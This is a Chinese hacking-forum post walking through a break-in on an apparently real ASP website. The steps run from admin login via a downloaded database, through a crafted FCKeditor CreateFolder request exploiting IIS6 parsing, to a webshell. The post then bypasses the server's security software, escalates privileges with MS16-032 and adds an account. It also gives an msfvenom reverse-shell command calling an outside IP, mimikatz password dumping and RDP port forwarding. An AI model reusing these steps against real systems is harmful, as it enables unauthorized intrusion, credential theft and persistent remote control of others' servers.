找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2133|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

6 T6 j" B* ~2 M" r* U* T! r

! J, J9 A+ U6 n4 n2 G. V3 y7 Q! f" v$ v8 m1 j" [5 b$ Z4 e+ y8 B; [& p/ h* P1 J- m/ |+ j( Q8 \- @/ a' K1 v/ j4 |8 L/ z; `5 d* U2 b4 H$ o8 N2 [. e/ J4 }; a) P; V
; B7 T: a1 i2 I) t9 Y; O( K

: l" L# i0 T( b3 A
) C$ `5 h& O8 o C8 [1 Z
一、 利用getwebshell
' n3 G$ C3 ~* D- C* ~+ w. [6 {& a- n
: E1 C" S1 I: E' Z) q! y+ k
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
+ f7 W3 ~5 I" c$ c
0 z! L: p( j! a7 h 222.png
8 w( i, I/ f" }+ D
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
9 U$ j0 [( O0 r* Q' W B4 s 333.png
$ @7 \, \0 D3 z4 N8 L
下面我们构造一个asp目录,如: - t$ V5 V3 s/ b* w. B5 z! I( {" F! T

$ f S3 T/ B |" ?8 r

9 \7 c* P$ V6 @. O http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 " Q- g5 {1 I& y1 F

% j5 X) p" d3 D* k" A! Q

4 w# S/ E, a, n4 L; G0 j 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
8 C9 D* q7 \" n0 x) Z0 V/ b o M! d
0 F2 M" M1 N- C3 k+ f1 W7 x0 q
一、 绕过安全狗云锁提权并且加账号
( n7 i" w+ H& F- P; k) o444.png
9 h4 Y5 M# F; T& H; u8 B1 ^5 f+ J T
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
1 H7 Y! W% B. _+ d+ r% }2 O9 G' w
: M6 [$ ~7 x! a" m) L
如图:
+ u" r1 C2 E/ T n% c2 ?8 I' o$ r 555.png
/ I& S+ r% c) V" [- z
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
5 |' k# e5 @$ `; o, k
9 m& X$ D3 s0 Y. F* m3 |- b
一、 利用metasploit
`7 H4 a3 w, ^/ L* `1 u9 i1 c$ J
, v& ]7 o# r. K$ A, l( K5 w+ o3 j9 x
首先用pentestbox生成一个64位的payload如下命令
# w: S! X- z9 C
6 `( v$ u8 @) n, ?( m, }1 W msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
" ~. X0 X+ W; [2 n3 ^* t
8 I* d8 g" o( j6 `! e h; I
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
2 l* v4 x, I8 R! h. S: l6 R4 c11.png
7 W2 d- ~3 Z- }4 [" B# x! x
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
$ U. r/ W% A4 @ i3 U- k13.png
- t6 v& |$ r# _% {/ b
下面我们来做一个监听如下命令:
9 l, n" {' A. ^' l( J! r" C1 Y
- P6 G ]* u3 E0 O' a+ { portfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
# o. j6 Z1 R- f 18.png
- z) l* e! e' v7 P5 Y5 ]! Y

7 o" j, A: P) _2 c# s
2 M, q. M$ i8 e+ _7 R3 m* m4 `

+ ^( c9 ~4 w1 j! z) D

" \& j9 G. M3 i6 n4 w8 Z7 O
. i/ Q0 P' O4 @" n' O8 @/ d
0 |# v$ K/ i8 ^5 Z4 R
! [+ {: A% W, }* M# f0 |" V9 X; n

* g) J; @" x1 F5 Y; }
% g! G' v$ i& N% i& q! i8 A 4 B, M, e4 G( J3 n

) i8 z* v0 |3 y& u: E; `( I
. \, u" |+ a9 n

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表